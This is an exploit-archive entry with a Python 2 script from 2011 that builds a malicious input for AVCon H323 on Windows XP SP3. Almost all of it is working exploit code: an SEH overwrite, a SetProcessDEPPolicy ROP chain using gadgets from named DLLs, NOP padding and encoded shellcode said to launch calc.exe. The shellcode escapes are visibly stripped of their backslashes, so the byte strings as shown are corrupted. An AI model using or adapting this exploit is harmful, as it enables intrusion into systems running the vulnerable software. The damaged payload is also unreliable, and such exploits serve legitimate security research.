[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : AVCon DEP Bypass
# Published : 2011-09-20
# Author :
# Previous Title : bzexe (bzip2) race condition
# Next Title : Calibre E-Book Reader Local Root
# DEP Bypass for OptIn/OptOut
# all modules used are not aslr aware
# script produces a text file, copy the contents
# paste in the input field next to the call button
# discovered by Dillon Beresford
import sys
from struct import pack
print "n====================="
print "AVCon H323 DEP Bypass"
print " Written by Blake "
print " Tested on XP SP3 "
print "=====================n"
# around 619 bytes of space before seh overwrite
# if more space is needed, around 2263 bytes after seh overwrite
# calc.exe
shellcode =(
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44"
"x42x30x42x50x42x30x4bx48x45x54x4ex43x4bx38x4ex47"
"x45x50x4ax57x41x30x4fx4ex4bx58x4fx54x4ax41x4bx38"
"x4fx45x42x42x41x50x4bx4ex49x44x4bx38x46x33x4bx48"
"x41x50x50x4ex41x53x42x4cx49x59x4ex4ax46x58x42x4c"
"x46x57x47x30x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e"
"x46x4fx4bx53x46x55x46x32x46x50x45x47x45x4ex4bx58"
"x4fx45x46x52x41x50x4bx4ex48x56x4bx58x4ex50x4bx44"
"x4bx48x4fx55x4ex41x41x30x4bx4ex4bx58x4ex41x4bx38"
"x41x50x4bx4ex49x48x4ex45x46x32x46x50x43x4cx41x33"
"x42x4cx46x46x4bx38x42x44x42x53x45x38x42x4cx4ax47"
"x4ex30x4bx48x42x44x4ex50x4bx58x42x37x4ex51x4dx4a"
"x4bx48x4ax36x4ax30x4bx4ex49x50x4bx38x42x58x42x4b"
"x42x50x42x50x42x50x4bx38x4ax36x4ex43x4fx45x41x53"
"x48x4fx42x46x48x35x49x38x4ax4fx43x48x42x4cx4bx57"
"x42x45x4ax36x42x4fx4cx38x46x30x4fx35x4ax46x4ax39"
"x50x4fx4cx38x50x50x47x55x4fx4fx47x4ex43x46x41x46"
"x4ex46x43x36x42x50x5a")
# SetProcessDEPPolicy ROP Chain
seh = pack('<L',0x1001414a) # {pivot 2072} # POP EBX # MOV DWORD PTR FS:[0],ECX # ADD ESP,814 # RETN ** [avnmc2.dll]
rop_nop = "x41" * 3 # needed to align rop nop
rop_nop += pack('<L',0x10024c43) * 90 # RETN - avnmc2.dll
rop = pack('<L',0x20047e99) # POP EBX, RETN - HikPlayM4.dll
rop += "xffxffxffxff"
rop += pack('<L',0x6de13c78) # INC EBX # RETN 00 ** [xish264.dll]
rop += pack('<L',0x6ddc48e4) # POP EBP, RETN - xish264.dll
rop += pack('<L',0x7c8622a4) # SetProcessDEPPolicy - XP SP3
rop += pack('<L',0x20050f44) # POP EDI, RETN - HikPlayM4.dll
rop += pack('<L',0x20050f45) # RETN
rop += pack('<L',0X20014DE1) # POP ESI, RETN
rop += pack('<L',0x20050f45) # RETN
rop += pack('<L',0x10016d22) # PUSHAD # RETN ** [avnmc2.dll]
nops = "x90" * 20
junk = "x43" * 5000
buffer = "x41" * (1023 - len(rop_nop + rop + nops + shellcode)) # SEH overwritten at 1023
print "[+] Creating file"
try:
file = open("exploit.txt","w")
file.write(rop_nop + rop + nops + shellcode + buffer + seh + junk)
file.close()
print "[+] File created"
except:
print "[X] Error creating file!"
raw_input("[+] Press any key to exitn")